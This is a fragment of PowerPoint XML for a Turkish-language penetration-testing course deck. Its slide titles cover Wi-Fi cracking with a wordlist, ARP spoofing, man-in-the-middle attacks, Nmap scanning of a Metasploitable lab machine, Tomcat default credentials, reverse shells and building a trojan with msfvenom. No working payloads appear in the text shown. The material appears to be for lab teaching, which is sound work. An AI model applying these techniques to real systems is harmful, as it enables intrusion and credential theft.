              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Packet</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Captur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> PCAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> dosyasını oluşturduğumuz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WordList</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sifre.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>) ile beraber kullanıyoruz.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2981489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81B43DD3-47DE-99CE-37D8-FE573F715E2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="3065" r="1" b="7103"/>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36776590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Ağ Gözü</Template>
  <TotalTime>9101</TotalTime>
  <Words>2562</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Geniş ekran</PresentationFormat>
  <Paragraphs>167</Paragraphs>
  <Slides>79</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79</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="87" baseType="lpstr">
      <vt:lpstr>American Typewriter Condensed</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Modern Love</vt:lpstr>
      <vt:lpstr>Source Sans Pro</vt:lpstr>
      <vt:lpstr>The Hand</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>SketchyVTI</vt:lpstr>
      <vt:lpstr>Wifi Hacking ARP Spoofing Attack Man in The Middle(Ortadaki Adam Sal.) Metasploitable Makine Çözümü Windows(Trojen-Reverse Shell)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Arp Spoofing</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>TCP ve UDP Paket Göndermekteki Amacımız Ne ?</vt:lpstr>
      <vt:lpstr>Sızma işlemleri</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>Tcp- Udp portlarımızın osi’nin ulaşım katmanında çalıştığını Tcp’nin daha güvenli  (3’lü el sıkışma işlemi yaptığı), Udp’de paketlerin direkt gönderildiği ve hızlı olduğunu bilmemiz şimdilik bizim için yeterli olacaktır.</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>Metasploitable Nedir?</vt:lpstr>
      <vt:lpstr>Metasploitable 2 kurulumundan sonra bizleri console ekranı karşılar ve bizden kullanıcı “login”adını ardından kullanı “password”unu ister.</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>İfconfig : Ip, netmask ve broadcast bilgilerimizi veren Linux işletim sistemi komutudur.(Kali Makinası için geçerli)</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>Nmap Aracı</vt:lpstr>
      <vt:lpstr>Nmap Aracı</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>Nmap Tarama Türleri</vt:lpstr>
      <vt:lpstr>Nmap’te Kullanılan Opsiyonlar</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>sudo nmap 10.0.2.5</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>NMAP SCRİPT</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>8180 /TCP portunun açık olduğunu ve çalışan bir servisin olduğunu ama tam olarak ne çalıştığını göstermiyor. Bize alt satırlarda default olarak Apache Tomcat’in(web uygulamalarımızı yayınlayabildiğimiz web sunucusu) olabileceğini, admin, password bilgilerinin şunlar olabileceğini söylüyor. Tomcat:tomcat kritik olduğundan bahsetmiş. Web browser üzerinden ip adresimiz ve portu yazdığımızda ne olacağını göreceğiz.</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>Msfvenom ile trojen oluşturma.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Metasploitable Makine Çözümü</dc:title>
  <dc:creator>mchtzel@gmail.com</dc:creator>
  <cp:lastModifiedBy>Hplt 202</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-30T11:03:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-26T15:06:20Z</dcterms:modified>
</cp:coreProperties>
</file>